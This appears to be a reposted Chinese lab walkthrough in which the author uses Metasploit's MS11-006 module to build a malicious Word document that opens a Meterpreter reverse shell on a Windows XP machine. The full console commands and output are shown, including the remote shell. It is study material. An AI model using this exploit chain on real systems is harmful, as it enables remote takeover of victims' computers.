首頁 > 開發者 > Shell

metasploit檔案格式漏洞滲透攻擊(成功獲得shell)

來源:互聯網
上載者:User
創建阿里雲帳戶,並獲得超過 40 款產品的免費試用版;而企業帳戶則可以享有總值 $1200 的免費試用版。立即註冊!

環境BT5R1 

msf > use windows/fileformat/ms11_006_createsizeddibsectionmsf  exploit(ms11_006_createsizeddibsection) > set payload windows/meterpreter/reverse_tcppayload => windows/meterpreter/reverse_tcpmsf  exploit(ms11_006_createsizeddibsection) > set LHOST 192.168.1.11LHOST => 192.168.1.11msf  exploit(ms11_006_createsizeddibsection) > set LPORT 443LPORT => 443msf  exploit(ms11_006_createsizeddibsection) > set OUTPUTPATH /opt/framework/msf3/data/exploits/OUTPUTPATH => /opt/framework/msf3/data/exploits/msf  exploit(ms11_006_createsizeddibsection) > show optionsModule options (exploit/windows/fileformat/ms11_006_createsizeddibsection):   Name        Current Setting                     Required  Description   ----        ---------------                     --------  -----------   FILENAME    msf.doc                             yes       The file name.   OUTPUTPATH  /opt/framework/msf3/data/exploits/  yes       The output path to use.Payload options (windows/meterpreter/reverse_tcp):   Name      Current Setting  Required  Description   ----      ---------------  --------  -----------   EXITFUNC  seh              yes       Exit technique: seh, thread, process, none   LHOST     192.168.1.11     yes       The listen address   LPORT     443              yes       The listen portExploit target:   Id  Name   --  ----   0   Automaticmsf  exploit(ms11_006_createsizeddibsection) > exploit[*] Creating 'msf.doc' file ...[*] Generated output file /opt/framework/msf3/data/exploits/msf.docmsf  exploit(ms11_006_createsizeddibsection) > use multi/handlermsf  exploit(handler) > set payload windows/meterpreter/reverse_tcppayload => windows/meterpreter/reverse_tcpmsf  exploit(handler) > set LHOST 192.168.1.11LHOST => 192.168.1.11msf  exploit(handler) > set LPORT 443LPORT => 443msf  exploit(handler) > exploit -j[*] Exploit running as background job.[*] Started reverse handler on 192.168.1.11:443 [*] Starting the payload handler...msf  exploit(handler) > sessions -lActive sessions===============No active sessions.msf  exploit(handler) >

把msf.doc複製到XP裡,一開始,雙擊,BT5沒反應。

後來,我用縮圖來查看,不需要雙擊msf.doc,BT5就有反應了(書中說是要開啟該文檔,估計有誤)。 

msf  exploit(handler) > [*] Sending stage (752128 bytes) to 192.168.1.143[*] Meterpreter session 1 opened (192.168.1.11:443 -> 192.168.1.143:1099) at 2013-05-14 19:32:47 -0400msf  exploit(handler) > sessions -lActive sessions===============  Id  Type                   Information                                      Connection  --  ----                   -----------                                      ----------  1   meterpreter x86/win32  ROOT-4556186478\Administrator @ ROOT-4556186478  192.168.1.11:443 -> 192.168.1.143:1099msf  exploit(handler) > sessions -i 1[*] Starting interaction with 1...meterpreter > lsListing: C:\Documents and Settings\Administrator================================================Mode              Size    Type  Last modified              Name----              ----    ----  -------------              ----40777/rwxrwxrwx   0       dir   2013-05-14 10:20:44 -0400  .40777/rwxrwxrwx   0       dir   2013-05-14 10:20:43 -0400  ..40555/r-xr-xr-x   0       dir   2013-05-14 10:21:13 -0400  Application Data40777/rwxrwxrwx   0       dir   2013-05-14 10:14:40 -0400  Cookies40777/rwxrwxrwx   0       dir   2013-05-14 17:51:30 -0400  Desktop40555/r-xr-xr-x   0       dir   2013-05-14 10:21:21 -0400  Favorites40777/rwxrwxrwx   0       dir   2013-05-14 17:51:30 -0400  Local Settings40555/r-xr-xr-x   0       dir   2013-05-14 10:21:22 -0400  My Documents100666/rw-rw-rw-  786432  fil   2013-05-14 11:30:17 -0400  NTUSER.DAT40777/rwxrwxrwx   0       dir   2013-05-14 17:51:30 -0400  NetHood40777/rwxrwxrwx   0       dir   2013-05-14 17:51:30 -0400  PrintHood40555/r-xr-xr-x   0       dir   2013-05-14 11:30:35 -0400  Recent40555/r-xr-xr-x   0       dir   2013-05-14 10:21:02 -0400  SendTo40555/r-xr-xr-x   0       dir   2013-05-14 17:51:30 -0400  Start Menu40777/rwxrwxrwx   0       dir   2013-05-14 10:10:10 -0400  Templates100666/rw-rw-rw-  1024    fil   2013-05-14 11:32:49 -0400  ntuser.dat.LOG100666/rw-rw-rw-  178     fil   2013-05-14 10:23:33 -0400  ntuser.inimeterpreter > sysinfoComputer        : ROOT-4556186478OS              : Windows XP (Build 2600, Service Pack 3).Architecture    : x86System Language : en_USMeterpreter     : x86/win32meterpreter > shellProcess 1888 created.Channel 1 created.Microsoft Windows XP [Version 5.1.2600](C) Copyright 1985-2001 Microsoft Corp.C:\Documents and Settings\Administrator>

如果換到簡體中文版本的XP上面,用縮圖查看,則會失敗,無法獲得shell。


本文章原先以中文撰寫並發佈於 aliyun.com,亦設英文版本,僅作資訊用途。本網站不對文章的準確性,完整性或可靠性或其任何翻譯作出任何明示或暗示的陳述或保證。如對該文章有任何疑慮或投訴,請傳送電郵至 info-contact@alibabacloud.com 並提供相關疑慮或投訴的詳細說明。職員會於 5 個工作天內與您聯絡,一經驗證之後,即會刪除該侵權內容。

相關關鍵詞:
metasploit linux metasploit project metasploit pdf metasploit framework metasploit price metasploit android metasploit video
相關文章
linux在shell中日期格式化(時間格式化)__linux
終於搞懂了shell bash cmd...
從外網訪問使用Padavan韌體的路由器(花生殼DDNS配置教程)
EFI Shell 命令
linux shell中單引號、雙引號、反引號、反斜線的區別
如何在shell指令碼裡使用sftp批量傳送檔案

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

熱門內容

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More